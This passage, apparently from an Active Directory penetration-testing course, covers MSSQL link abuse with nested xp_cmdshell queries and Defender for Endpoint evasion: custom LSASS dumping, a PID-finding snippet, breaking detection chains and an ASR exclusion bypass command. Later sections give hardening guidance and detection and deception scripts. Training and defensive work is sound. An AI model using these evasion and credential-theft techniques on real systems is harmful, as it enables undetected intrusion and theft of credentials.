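                paths[target] = paths[here] + [target]
                queue.append(target)
    return paths


def nested_openquery(path, inner_sql):
    """Build the chained openquery statement for path [start, hop1, ..., target].

    Each nesting level doubles every single quote of the query it wraps; that
    is why a two-hop query ends in '')') and a three-hop one in '''')'')')."""
    query = inner_sql
    for server in reversed(path[1:]):
        query = "select * from openquery(\"%s\",'%s')" % (server, query.replace("'", "''"))
    return query


def dns_suffix(server):
    # '' for NetBIOS-style names such as dcorp-sql1
    return server.split(".", 1)[1].lower() if "." in server else ""


def risky_links(links, home_forest):
    """Flag links that leave the home forest (links work across forest trusts) or
    have RPC Out enabled (which lets EXECUTE ... AT enable xp_cmdshell remotely)."""
    findings = []
    for src, targets in links.items():
        for dst, rpc_out in targets:
            reasons = []
            if rpc_out:
                reasons.append("rpc_out")
            suffix = dns_suffix(dst)
            if suffix and not suffix.endswith(home_forest.lower()):
                reasons.append("cross-forest")
            if reasons:
                findings.append((src, dst, reasons))
    return findings


if __name__ == "__main__":
    for server, path in crawl_links(LINKS, "dcorp-mssql").items():
        print("%-26s via %s" % (server, " -> ".join(path)))
    print(nested_openquery(["dcorp-mssql", "dcorp-sql1", "dcorp-mgmt"], "select * from master..sysservers"))
    for src, dst, why in risky_links(LINKS, "moneycorp.local"):
        print("%s -> %s: %s" % (src, dst, ", ".join(why)))
```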



Trust Abuse - MSSQL Servers - Database Links
Executing Commands
• Use the -QueryTarget parameter to run the query on a specific instance
(without -QueryTarget the command tries to use xp_cmdshell on every link of
the chain):
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec
master..xp_cmdshell 'whoami'" -QueryTarget eu-sql

• From the initial SQL server, OS commands can be executed using nested link
queries:
select * from openquery("dcorp-sql1",'select * from openquery("dcorp-mgmt",''select * from openquery("eu-sql.eu.eurocorp.local",''''select @@version as version;exec master..xp_cmdshell "powershell whoami"'''')'')')



Learning Objective 22
• Get a reverse shell on a SQL server in eurocorp forest by abusing
database links from dcorp-mssql.



Introduction to EDR

• Endpoint Detection and Response (EDR) systems protect individual devices
(endpoints) by continuously monitoring for and responding to security threats.

• An EDR includes features for threat detection, incident response, investigation, and
forensics, making it a vital component of modern cybersecurity strategies.

• Most EDRs correlate activity to gain broader telemetry and improve on detections.
Even if all performed activity is undetected by an AV, EDRs can still correlate all
actions performed to identify attacker TTPs.

Introduction to EDR - MDE

• In this lab, we will be targeting the popular, high performing EDR by Microsoft -
Microsoft Defender for Endpoint (MDE).

• In addition to standard EDR capabilities, MDE collects and processes behavioral
signals from the OS and analyzes these using cloud security analytics.

• MDE also supports detections based on the following technologies:
– Attack Surface Reduction rules, Exploit protection, Network protection, Controlled Folder Access
and Device control.

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint?view=o365-worldwide
Introduction to EDR - MDE

• MDE is enabled on eu-sql in the lab.

• Visit the MDE dashboard https://security.microsoft.com and login with your student credentials to
view and correlate performed activity in the Incidents and Alerts tab.
• Student credentials are available in the lab portal - https://adlab.enterprisesecurity.io/

• Our objective is to remain undetected by AV and EDR on eu-sql to perform:
– SQL command execution through SQL Server links
– Tool transfer
– Credential extraction
– Data exfiltration
– Lateral movement / remote access

MDE - Credential Extraction – LSASS Dump

• While performing LSASS credential dumping, direct interaction/extraction of data
from the LSASS process (Ex: Mimikatz sekurlsa::logonpasswords) is detected by
MDE.

• A more opsec friendly way is by performing a dump of the LSASS process in a covert
way and then exfiltrating it to later analyze offline.

• However, standard techniques to create LSASS dumps (Ex: taskmanager → create
dump file) are detected and blocked.

MDE - Credential Extraction – LSASS Dump

• Most tools create an LSASS dump by:
1. Gaining a handle to the LSASS process.
2. Creating a minidump using the MiniDumpWriteDump WinAPI function implemented in
dbghelp.dll / dbgcore.dll.
3. Writing the dump file on disk.

• These 3 actions are heavily monitored by EDRs and are usually detected and
blocked.

• To circumvent these detections, we can avoid using tools that implement the
MiniDumpWriteDump function and perform the LSASS dump in a different way.

MDE - Credential Extraction – LSASS Dump using Custom APIs

• MiniDumpDotNet (https://github.com/WhiteOakSecurity/MiniDumpDotNet) is a
tool that implements a custom reimplementation of the MiniDumpWriteDump
Windows API function.

• In this tool, the MiniDumpWriteDump function is reversed, and a custom
implementation is written based on a Beacon Object File (BOF) adaptation and
ReactOS source code.

Look at slide notes for references.

MiniDumpDotNet Blog - https://www.whiteoaksecurity.com/blog/minidumpdotnet-part-1/
NanoDump Github: https://github.com/helpsystems/nanodump
PostDump Github: https://github.com/YOLOP0wn/POSTDump
Custom MiniDumpWriteDump BOF Github: https://github.com/rookuu/BOFs/tree/main/MiniDumpWriteDump
ReactOS Source code for MiniDumpWriteDump implementation: https://doxygen.reactos.org/d8/d5d/minidump_8c_source.html
MiniDumpWriteDump Windows API function: https://learn.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump
MDE - Credential Extraction – LSASS Dump using Custom APIs

• MiniDumpDotNet provides .NET CLR injectable LSASS process dumping capability
along with CLR support (.NET runtime) to support execution through a standalone
binary, Assembly.Load(), PowerShell and JScript/VBS.

• This tool can also be used to dump any process. For example, dumping processes like
Outlook may result in cleartext credentials.

• Dump the LSASS process with minidumpdotnet using the following syntax. Note that
we need the Process ID of the LSASS process:
.\minidumpdotnet.exe <LSASS PID> <minidump file>

MDE - Credential Extraction – LSASS Dump using Custom APIs -
MiniDumpDotnet Setup

• Clone/Download the project:
git clone https://github.com/WhiteOakSecurity/MiniDumpDotNet.git
Note: This project was implemented with Visual Studio 2015, but should be supported by any Visual Studio
compiler that can build VS C++ CLR code.

• Building the solution will generate both a binary executable, as well as a .NET class
library.

• Build the project: Build -> Build Solution

MDE - Credential Extraction – LSASS Dump using Custom APIs -
MiniDumpDotnet AV Signatures

• Checking for any detections by Windows Defender using DefenderCheck:
C:\AD\Tools\DefenderCheck> .\DefenderCheck.exe C:\AD\Tools\minidumpdotnet.exe
[+] No threat found in submitted file!

MDE - Credential Extraction – LSASS Dump using Custom
APIs
• No detections by MDE!

MDE - Credential Extraction – LSASS Dump using Custom APIs -
Find LSASS PID

• Using commands like tasklist /v to enumerate the LSASS PID is detected
by MDE.

• To avoid this, we can make use of standard WinAPIs to find the LSASS
PID, which is opsec safe.

• In case of RDP access, tools like Task Manager (or other less suspicious
alternatives) could also be used for finding the LSASS PID.

MDE - Credential Extraction – LSASS Dump using Custom APIs -
Find LSASS PID

• Here is a code snippet of a custom function called FindPID in C++ to dynamically
enumerate the LSASS PID:
// Find PID of a process by name (e.g. "lsass.exe") using the ToolHelp snapshot API.
// Build without UNICODE defined (multi-byte character set) so that szExeFile is a char array.
#include <windows.h>
#include <tlhelp32.h>
#include <string.h>

int FindPID(const char* procname)
{
    int pid = 0;
    PROCESSENTRY32 proc = {};
    proc.dwSize = sizeof(PROCESSENTRY32);
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE)
        return 0;                       // snapshot failed, no PID to return
    bool bProc = Process32First(snapshot, &proc);
    while (bProc)
    {
        // exact (case-sensitive) match on the image name
        if (strcmp(procname, proc.szExeFile) == 0)
        {
            pid = proc.th32ProcessID;
            break;
        }
        bProc = Process32Next(snapshot, &proc);
    }
    CloseHandle(snapshot);              // release the snapshot handle
    return pid;
}
MDE - Credential Extraction – LSASS Dump using Custom APIs -
Find LSASS PID

• If the FindPID function is added to the MiniDumpDotnet tool, there is a
detection by MDE.

MDE - Credential Extraction – LSASS Dump using Custom APIs -
Find LSASS PID

• Using the FindPID code in a standalone executable is not detected by Defender AV
or MDE. Let's call it FindLSASSPID.exe.
C:\AD\Tools\DefenderCheck> .\DefenderCheck.exe C:\AD\Tools\FindLSASSPID.exe
[+] No threat found in submitted file!

MDE - Tools Transfer and Execution

• Now that we have a couple of executables, let’s transfer them to the target.

• Downloading tools over HTTP(S) can be risky as it does increase the risk score and
chances of detection by the EDR.

• However, if binaries that are intended for downloads such as Edge (msedge.exe) are
available on the target we can perform HTTP(S) downloads without any detections.

• Another opsec friendly way would be to share files over SMB. Execution can be
directly performed from a readable share and is less risky than standard download
and execute actions.
MDE - Breaking Detection Chains

• In our experience, most EDRs correlate activity in a specific time interval
after which it is reset; this interval varies for each EDR.

• To bypass these correlation-based detections we can:
– Attempt to wait for a small time interval (~10 mins) before
performing the next query.
– Append non-suspicious queries in between subsequent suspicious
ones to break the detection chains.

• We will run simple SQL queries on the eu-sql server.


MDE - Lateral Movement - ASR Rules

• MDE correlates detections heavily around Attack Surface Reduction
(ASR) rules.

• ASR rules are configurations that can be applied and customized to
reduce the attack surface of a machine. These rules can be customized
and referenced with their unique GUIDs.

• ASR rules are written in Lua (.lua) and can be reversed and extracted from a
specific target Windows machine.

Microsoft ASR rules: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide
Gist of ASR rules: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#attack-surface-reduction-rules-by-type
MDE - Lateral Movement - ASR Rules Bypass

• ASR rules are easy to understand. For example, the GetMonitoredLocations function lists the
processes that are monitored; remote execution using them will result in a detection. [Check the
slide notes]

• OS trusted methods like WMI and PSRemoting or administrative tools like PsExec are detected by
MDE.

• To avoid detections based on a specific ASR rule such as the "Block process creations originating from
PSExec and WMI commands" rule:
– We can use alternatives such as WinRM access (winrs) instead of PsExec/WMI execution (this is undetected by MDE but
detected by MDI).
– Use the GetCommandLineExclusions function, which lists the command line exclusions (Ex:
".:\\windows\\ccm\\systemtemp\\.+"); including one in the command line bypasses this rule and its detection.
C:\AD\Tools\WSManWinRM.exe eu-sql.eu.eurocorp.local "cmd /c notepad.exe C:\Windows\ccm\systemtemp\"

"Block process creations originating from PSExec and WMI commands" ASR rule reversed:
https://github.com/HackingLZ/ExtractedDefender/blob/main/asr/d1e49aac-8f56-4280-b9ba-993a6d77406c
MDE - Lateral Movement – Process Detection

• Once we have remote access to a machine, we can use commands like
whoami.exe for initial enumeration.

• Since whoami.exe is unlikely to be used under a process like
sqlservr.exe, a detection is likely to happen.

• A more opsec friendly way is by using alternatives such as SET
USERNAME which performs the same functionality as whoami.exe to
enumerate the current username using environment variables.

MDE - Lateral Movement – Process Detection

• An example of a detection of whoami.exe spawned under sqlservr.exe is shown
below:
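The process-tree detection above (whoami.exe under sqlservr.exe, with cmd.exe as the xp_cmdshell intermediary) and the time-window correlation described under "Breaking Detection Chains" can both be expressed as simple rules. The following is an added example, not MDE's logic and not course code: it runs the rules over constructed process-creation events; the event shape, the 10-minute window and the escalation threshold are assumptions.

```python
"""Process-tree and time-window correlation rules for the behaviour described above.

Added example; the events are constructed in a Sysmon/MDE-like shape, not real
telemetry, and the window/threshold values are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Children that have no business under SQL Server (xp_cmdshell runs commands via cmd.exe)
SUSPICIOUS_CHILDREN = {"cmd.exe", "whoami.exe", "tasklist.exe", "powershell.exe", "net.exe", "rundll32.exe"}
DATABASE_PARENTS = {"sqlservr.exe"}

CORRELATION_WINDOW = timedelta(minutes=10)  # assumed; the slides quote "~10 mins"
ESCALATE_AT = 3                              # suspicious events per host inside one window


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%S")


def evaluate_event(ev):
    """Return the rule names that fire for one process-creation event.

    ev["ancestry"] lists [parent, grandparent, ...] image names."""
    hits = []
    chain = [p.lower() for p in ev["ancestry"]]
    image = ev["image"].lower()
    if image in SUSPICIOUS_CHILDREN:
        if chain and chain[0] in DATABASE_PARENTS:
            hits.append("sqlservr_spawned_" + image)
        elif len(chain) > 1 and chain[1] in DATABASE_PARENTS:
            # xp_cmdshell spawns cmd.exe, which spawns the real command: check the grandparent
            hits.append("sqlservr_cmd_chain_" + image)
    if image == "cmd.exe":
        # "set USERNAME" creates no child process, so only the command line reveals it
        cmdline = ev["cmdline"].lower()
        if any(tok in cmdline for tok in ("set username", "set computername", "echo %username%")):
            hits.append("env_var_recon")
    return hits


def correlate(events, window=CORRELATION_WINDOW, threshold=ESCALATE_AT):
    """Sliding window per host over suspicious events only.

    Returns (alerts, incidents): alerts is every (host, time, hits) that fired,
    incidents lists (host, time) where the count reached the threshold inside one
    window. Benign events in between do not reset the window, so interleaving
    non-suspicious queries does not break this chain; only waiting does."""
    alerts, incidents = [], []
    recent = defaultdict(list)  # host -> timestamps of suspicious events still in window
    for ev in sorted(events, key=lambda e: e["time"]):  # ISO timestamps sort lexically
        hits = evaluate_event(ev)
        if not hits:
            continue
        t = _ts(ev["time"])
        alerts.append((ev["host"], ev["time"], hits))
        recent[ev["host"]] = [x for x in recent[ev["host"]] if t - x <= window] + [t]
        if len(recent[ev["host"]]) >= threshold:
            incidents.append((ev["host"], ev["time"]))
            recent[ev["host"]].clear()  # one incident per burst
    return alerts, incidents


# Constructed events: three suspicious children within a minute, a benign conhost,
# an unrelated host, and a late whoami after the window has expired
SAMPLE_EVENTS = [
    {"time": "2024-06-01T10:00:00", "host": "eu-sql", "image": "whoami.exe",
     "ancestry": ["cmd.exe", "sqlservr.exe"], "cmdline": "whoami.exe"},
    {"time": "2024-06-01T10:00:05", "host": "eu-sql", "image": "cmd.exe",
     "ancestry": ["sqlservr.exe"], "cmdline": "cmd.exe /c set USERNAME"},
    {"time": "2024-06-01T10:00:10", "host": "eu-sql", "image": "conhost.exe",
     "ancestry": ["cmd.exe", "sqlservr.exe"], "cmdline": "conhost.exe 0x4"},
    {"time": "2024-06-01T10:00:30", "host": "eu-sql", "image": "tasklist.exe",
     "ancestry": ["cmd.exe", "sqlservr.exe"], "cmdline": "tasklist /v"},
    {"time": "2024-06-01T10:01:00", "host": "dcorp-mgmt", "image": "svchost.exe",
     "ancestry": ["services.exe"], "cmdline": "svchost.exe -k netsvcs"},
    {"time": "2024-06-01T10:25:00", "host": "eu-sql", "image": "whoami.exe",
     "ancestry": ["cmd.exe", "sqlservr.exe"], "cmdline": "whoami.exe /all"},
]

if __name__ == "__main__":
    found_alerts, found_incidents = correlate(SAMPLE_EVENTS)
    for host, when, hits in found_alerts:
        print("ALERT    %s %s %s" % (when, host, ", ".join(hits)))
    for host, when in found_incidents:
        print("INCIDENT %s %s" % (when, host))
```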

Learning Objective 23
• Compromise eu-sqlx again. Use opsec friendly alternatives to bypass
MDE and MDI.



Attack Paths



Detection and Defense
• Protect and Limit Domain Admins
• Isolate administrative workstations
• Secure local administrators
• Time bound and just enough administration
• Isolate administrators in a separate forest and breach containment using
Tiers and ESAE



Protect and Limit Domain Admins
• Reduce the number of Domain Admins in your environment.
• Do not allow or limit login of DAs to any other machine other than the
Domain Controllers.
• Never run a service with a DA. Credential theft protections which we are
going to discuss soon are rendered useless in case of a service account.
• Set "Account is sensitive and cannot be delegated" for DAs.



Protect and Limit Domain Admins
Protected Users Group
• Protected Users is a group introduced in Server 2012 R2 for "better protection against
credential theft" by not caching credentials in insecure ways. A user added to this group has
following major device protections:
– Cannot use CredSSP and WDigest - No more cleartext credentials caching.
– NTLM hash is not cached.
– Kerberos does not use DES or RC4 keys. No caching of clear text cred or long term keys.
• If the domain functional level is Server 2012 R2, following DC protections are available:
– No NTLM authentication.
– No DES or RC4 keys in Kerberos pre-auth.
– No delegation (constrained or unconstrained)
– No renewal of TGT beyond initial four hour lifetime - Hardcoded, unconfigurable
"Maximum lifetime for user ticket" and "Maximum lifetime for user ticket renewal"

https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/how-to-configure-protected-accounts#BKMK_AddtoProtectedUsers


Protect and Limit Domain Admins
Protected Users Group
• Needs all domain controllers to be at least Server 2008 or later (because of
AES keys).
• Not recommended by MS to add DAs and EAs to this group without
testing "the potential impact" of lock out.
• No cached logon, i.e. no offline sign-on.
• Having computer and service accounts in this group is useless as their
credentials will always be present on the host machine.



Isolate administrative workstations
Privileged Administrative Workstations (PAWs)
• A hardened workstation for performing sensitive tasks like
administration of domain controllers, cloud infrastructure, sensitive
business functions etc.
• Can provide protection from phishing attacks, OS vulnerabilities and
credential replay attacks.
• Admin Jump servers to be accessed only from a PAW, multiple strategies
– Separate privilege and hardware for administrative and normal tasks.
– Having a VM on a PAW for user tasks.


https://learn.microsoft.com/en-us/previous-versions/mt227395(v=msdn.10)

Time Bound Administration - JIT
• Just In Time (JIT) administration provides the ability to grant time-bound
administrative access on a per-request basis.
• Check out Temporary Group Membership! (Requires Privileged Access
Management Feature to be enabled which can't be turned off later)
Add-ADGroupMember -Identity 'Domain Admins' -Members
newDA -MemberTimeToLive (New-TimeSpan -Minutes 60)



Time Bound Administration - JEA
• JEA (Just Enough Administration) provides role based access control for
PowerShell based remote delegated administration.
• With JEA non-admin users can connect remotely to machines for doing
specific administrative tasks.
• For example, we can control the command a user can run and even
restrict parameters which can be used.
• JEA endpoints have PowerShell transcription and logging enabled.



Detection and Defense - ESAE
ESAE (Enhanced Security Admin Environment)
• Dedicated administrative forest for managing critical assets like administrative
users, groups and computers.
• Since a forest is considered a security boundary rather than a domain, this
model provides enhanced security controls.
• The administrative forest is also called the Red Forest.
• Administrative users in a production forest are used as standard non-
privileged users in the administrative forest.
• Selective Authentication to the Red Forest enables stricter security controls
on logon of users from non-administrative forests.
• Microsoft retired ESAE in 2021 and replaced it with Privileged Access Strategy
but it is still worth discussing.

https://learn.microsoft.com/en-us/security/compass/esae-retirement
https://learn.microsoft.com/en-us/security/compass/privileged-access-strategy



ESAE



Detection and Defense - Privileged Access Strategy
• Privileged access strategy is Microsoft's guidance for securing an
enterprise.
• ".. a broader strategy to move towards a Zero Trust architecture"
• Zero Trust - Verify explicitly, Use least privilege access and Assume
breach.
• Privileged access strategy includes and focuses on using Azure services.
"Cloud is a source of security"
• Includes a Rapid Modernization Plan (RAMP) to adopt the recommendations.

https://learn.microsoft.com/en-us/security/privileged-access-workstations/privileged-access-strategy
https://learn.microsoft.com/en-us/security/privileged-access-workstations/security-rapid-modernization-plan


Detection and Defense - Privileged Access Strategy

Image Source - https://learn.microsoft.com/en-us/security/privileged-access-workstations/privileged-access-strategy


Detection and Defense - Enterprise Access Model
• This replaces the Tier model discussed earlier. This model uses different
planes:
• Control Plane
– Addresses access control. Identity is the primary control.
– Other access controls include network, applications and data.
• Management plane - To manage and monitor assets
• Data/Workload Plane - Assets with business value like applications, data,
workload, IP etc.
• User access - Employee access, public access, B2B etc.
• App access - API access

https://learn.microsoft.com/en-us/security/privileged-access-workstations/privileged-access-access-model


Detection and Defense - Enterprise Access Model

Image source - https://learn.microsoft.com/en-us/security/privileged-access-workstations/privileged-access-access-model


Detection and Defense - Credential Guard
• It "uses virtualization-based security to isolate secrets so that only
privileged system software can access them".
• Effective in stopping PTH and Over-PTH attacks by restricting access to
NTLM hashes and TGTs. It is not possible to write Kerberos tickets to
memory even if we have credentials.
https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/

https://www.blackhat.com/docs/us-15/materials/us-15-Moore-Defeating%20Pass-the-Hash-Separation-Of-Powers-wp.pdf


Detection and Defense - Credential Guard
• But credentials for local accounts in the SAM and service account credentials in LSA Secrets are NOT protected.
• Credential Guard cannot be enabled on a domain controller, as it breaks authentication there.
• Only available on Windows 10 and later Enterprise edition and Server 2016 and later.
• There are bypasses, but it is still very effective.




Detection and Defense - Device Guard (WDAC)
• It is a group of features "designed to harden a system against malware attacks. Its focus is preventing malicious code from running by ensuring only known good code can run."
• Three primary components:
– Configurable Code Integrity (CCI) - Configure only trusted code to run
– Virtual Secure Mode Protected Code Integrity - Enforces CCI with Kernel Mode (KMCI) and User Mode (UMCI)
– Platform and UEFI Secure Boot - Ensures boot binaries and firmware integrity
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/introduction-to-device-guard-virtualization-based-security-and-windows-defender-application-control
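Both the Credential Guard slides and this Device Guard (WDAC) slide describe protections that are easy to believe are on when they are not. The script below is an added example (not part of the course material) that reports what is actually running on a host by reading the Win32_DeviceGuard CIM class Windows exposes for this purpose. The value meanings in the comments follow Microsoft's documentation of that class; the findings text is this example's own wording. Run it in an elevated PowerShell session on the host (or with -ComputerName over WinRM).

```powershell
# Added example, not from the course material: report Credential Guard, HVCI and
# WDAC enforcement state from the Win32_DeviceGuard CIM class.
#   SecurityServicesRunning        : 1 = Credential Guard, 2 = HVCI (memory integrity)
#   VirtualizationBasedSecurityStatus: 0 = Off, 1 = Enabled, 2 = Running
#   *CodeIntegrityPolicyEnforcementStatus: 0 = Off, 1 = Audit, 2 = Enforced
function Get-VbsProtectionStatus {
    [CmdletBinding()]
    param(
        # Host to query; a remote name makes Get-CimInstance use WinRM and needs admin rights there.
        [string]$ComputerName = $env:COMPUTERNAME
    )

    $remote = @{}
    if ($ComputerName -ne $env:COMPUTERNAME) { $remote.ComputerName = $ComputerName }

    $dg = Get-CimInstance @remote -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName 'Win32_DeviceGuard'

    # DomainRole 4 or 5 = domain controller. The slides note Credential Guard cannot be
    # enabled on a DC, so its absence there is expected rather than a finding.
    $isDc = (Get-CimInstance @remote -ClassName 'Win32_ComputerSystem').DomainRole -in 4, 5

    $running    = [int[]]$dg.SecurityServicesRunning
    $credGuard  = $running -contains 1
    $hvci       = $running -contains 2
    $enforce    = @{ 0 = 'Off'; 1 = 'Audit'; 2 = 'Enforced' }
    $vbsState   = @{ 0 = 'Off'; 1 = 'Enabled'; 2 = 'Running' }
    $kmci       = $enforce[[int]$dg.CodeIntegrityPolicyEnforcementStatus]
    $umci       = $enforce[[int]$dg.UsermodeCodeIntegrityPolicyEnforcementStatus]

    # Turn the raw state into the gaps a defender cares about.
    $findings = @()
    if (-not $credGuard -and -not $isDc) {
        $findings += 'Credential Guard not running: LSASS secrets readable by privileged code (PTH / Over-PTH exposure)'
    }
    if (-not $hvci) { $findings += 'HVCI not running: kernel-mode code integrity is not hypervisor-enforced' }
    if ($umci -ne 'Enforced') { $findings += "WDAC user-mode policy is '$umci': untrusted binaries and scripts can still run" }

    [pscustomobject]@{
        ComputerName            = $ComputerName
        IsDomainController      = $isDc
        VbsStatus               = $vbsState[[int]$dg.VirtualizationBasedSecurityStatus]
        CredentialGuardRunning  = $credGuard
        HvciRunning             = $hvci
        KernelModeCodeIntegrity = $kmci
        UserModeCodeIntegrity   = $umci
        Findings                = $findings
    }
}

# Usage (local host):
Get-VbsProtectionStatus | Format-List
```

On a domain controller the Credential Guard finding is suppressed because the slides state it cannot run there; that is exactly why tier-0 hosts still need the other controls (WDAC, tiered admin, logging) rather than relying on LSASS isolation.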




https://learn.microsoft.com/en-us/defender-for-identity/
https://learn.microsoft.com/en-us/defender-for-identity/understanding-security-alerts

https://www.blackhat.com/docs/us-17/thursday/us-17-Mittal-Evading-MicrosoftATA-for-ActiveDirectory-Domination.pdf

Detection and Defense - Ticket Forging and Replay
• For all the attacks that involve forging or replaying Kerberos tickets, the easiest detection is access to a privileged or higher-tier asset from a lower tier.

• Applies to Golden, Silver and Diamond tickets and a lot of other attacks!
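The detection the slide describes is a tiering check on logon events, not a signature for any one ticket type. Below is an added example (not part of the course material) that applies it to 4624 events: a tier-0 host reached from outside the PAW address range, or a tier-0 account used on a lower-tier host, is flagged. The host list, account list, PAW subnet and the sample logons are constructed for this example; replace them with your own inventory. Get-LogonRecord reads a live Security log; the sample records let the logic run offline.

```powershell
# Added example, not from the course material: tiering-boundary check over 4624 logon events.
$Tier0Hosts    = @('DC01', 'DC02', 'ADFS01')      # assumed tier-0 assets (inventory, not from the slides)
$Tier0Accounts = @('admin-t0', 'Administrator')   # assumed tier-0 admin accounts
$PawSubnets    = @('10.0.0.0/24')                 # assumed privileged access workstation range

function Test-IPv4InCidr {
    # True when $Ip falls inside the IPv4 CIDR range $Cidr (e.g. 10.0.0.0/24).
    param([string]$Ip, [string]$Cidr)
    $network, $prefix = $Cidr.Split('/')
    $toUInt = {
        param($addr)
        $b = [System.Net.IPAddress]::Parse($addr).GetAddressBytes()
        [Array]::Reverse($b)                       # network order -> little-endian for BitConverter
        [BitConverter]::ToUInt32($b, 0)
    }
    $mask = [Convert]::ToUInt32(('1' * [int]$prefix).PadRight(32, '0'), 2)
    return ((& $toUInt $Ip) -band $mask) -eq ((& $toUInt $network) -band $mask)
}

function Get-LogonRecord {
    # Reads 4624 events from a host's Security log and flattens the EventData fields used below.
    param([string]$ComputerName = $env:COMPUTERNAME, [int]$MaxEvents = 500)
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{ LogName = 'Security'; Id = 4624 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            [pscustomobject]@{
                Time = $_.TimeCreated; Computer = $x.Event.System.Computer
                TargetUserName = $d.TargetUserName; LogonType = $d.LogonType
                IpAddress = $d.IpAddress; WorkstationName = $d.WorkstationName
            }
        }
}

function Test-TierViolation {
    # Emits one finding object per tiering violation in a flattened logon record.
    param([Parameter(ValueFromPipeline)]$Logon)
    process {
        $findings    = @()
        $target      = $Logon.Computer.Split('.')[0]        # strip the DNS suffix
        $isTier0Host = $Tier0Hosts -contains $target
        $isTier0Acct = $Tier0Accounts -contains $Logon.TargetUserName
        $remoteIPv4  = ($Logon.IpAddress -match '^\d{1,3}(\.\d{1,3}){3}$') -and ($Logon.IpAddress -ne '127.0.0.1')

        # 1) A tier-0 host reached from outside the PAW range. A forged or replayed
        #    ticket used from a compromised workstation shows up exactly here.
        if ($isTier0Host -and $remoteIPv4) {
            $fromPaw = @($PawSubnets | Where-Object { Test-IPv4InCidr $Logon.IpAddress $_ }).Count -gt 0
            if (-not $fromPaw) { $findings += "tier-0 host $target reached from non-PAW address $($Logon.IpAddress)" }
        }
        # 2) A tier-0 account on a lower-tier host leaves its credentials where lower tiers can reach them.
        if ($isTier0Acct -and -not $isTier0Host) {
            $findings += "tier-0 account $($Logon.TargetUserName) used on lower-tier host $target (logon type $($Logon.LogonType))"
        }
        foreach ($f in $findings) {
            [pscustomobject]@{ Time = $Logon.Time; Account = $Logon.TargetUserName; Host = $target; Source = $Logon.IpAddress; Finding = $f }
        }
    }
}

# Constructed sample records (same shape Get-LogonRecord produces). Expected: records 2 and 3 are flagged.
$SampleLogons = @(
    [pscustomobject]@{ Time = '2024-01-10 09:01'; Computer = 'DC01.corp.local';      TargetUserName = 'admin-t0'; LogonType = '10'; IpAddress = '10.0.0.15';  WorkstationName = 'PAW-01' }
    [pscustomobject]@{ Time = '2024-01-10 09:07'; Computer = 'DC01.corp.local';      TargetUserName = 'admin-t0'; LogonType = '3';  IpAddress = '10.50.1.23'; WorkstationName = 'WS-FIN-07' }
    [pscustomobject]@{ Time = '2024-01-10 09:12'; Computer = 'WS-FIN-07.corp.local'; TargetUserName = 'admin-t0'; LogonType = '2';  IpAddress = '127.0.0.1';  WorkstationName = 'WS-FIN-07' }
    [pscustomobject]@{ Time = '2024-01-10 09:15'; Computer = 'WS-FIN-07.corp.local'; TargetUserName = 'bob';      LogonType = '2';  IpAddress = '127.0.0.1';  WorkstationName = 'WS-FIN-07' }
)
$SampleLogons | Test-TierViolation | Format-Table -AutoSize

# Live: Get-LogonRecord -ComputerName DC01 | Test-TierViolation
```

The check keys on the source IP rather than WorkstationName because the latter is supplied by the client in the logon request, so it is not something a detection should trust. The second rule is the one that makes the first enforceable: if tier-0 credentials are never present on lower-tier hosts, any lower-tier access to a tier-0 asset is by definition a stolen or forged credential.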




https://learn.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview

Detection and Defense - Deception
• Deception is a very effective technique in Active Directory defense.
• By using decoy domain objects, defenders can trick adversaries into following a particular attack path, which increases the chances of detection and raises the adversary's cost in terms of time.
• Traditionally, deception has been limited to leaving honey credentials on some boxes and checking their usage, but it can be used effectively during other phases of an attack as well.




Detection and Defense - Deception
• What to target? The adversary's mindset of going for the "lowest hanging fruit" and their illusory sense of superiority over defenders.
• We must provide adversaries with what they are looking for. For example, what adversaries look for in a user object:
– A user with high privileges.
– Permissions over other objects.
– Poorly configured ACLs.
– Misconfigured/dangerous user attributes and so on.
• Let's create some user objects which can be used for deceiving adversaries. We can use Deploy-Deception for this: https://github.com/samratashok/Deploy-Deception
• Note that the Windows Settings|Security Settings|Advanced Audit Policy Configuration|DS Access|Audit Directory Service Access Group Policy setting needs to be configured to enable 4662 logging.




Detection and Defense - User Deception
• Creates a decoy user whose password never expires, and a 4662 is logged whenever the x500uniqueIdentifier (d07da11f-8a3d-42b6-b0aa-76c962be719a) property of the user is read:
Create-DecoyUser -UserFirstName user -UserLastName manager -Password Pass@123 | Deploy-UserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose

• This property is not read by net.exe, WMI classes (like Win32_UserAccount) or the ActiveDirectory module, but LDAP-based tools like PowerView and ADExplorer trigger the logging.
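Deploy-Deception creates the decoy and the audit entry; the defender still has to turn the resulting 4662 events into an alert. The script below is an added example (not part of the course material and not part of Deploy-Deception) that does that: it flattens 4662 events and raises an alert whenever the Properties field lists the GUID from the slide. The decoy name, the DC name and the sample event records are constructed for this example; the audit subcategory is the one named on the previous slide.

```powershell
# Added example, not from the course material: alert on reads of the decoy user's
# x500uniqueIdentifier property, which is only touched by LDAP enumeration tools.
$DecoyPropertyGuid = 'd07da11f-8a3d-42b6-b0aa-76c962be719a'   # GUID used on the slide

function ConvertFrom-DsAccessEvent {
    # Flattens a 4662 event's EventData into the record shape Find-DecoyAccess expects.
    param([Parameter(ValueFromPipeline)]$Event)
    process {
        $x = [xml]$Event.ToXml()
        $d = @{}
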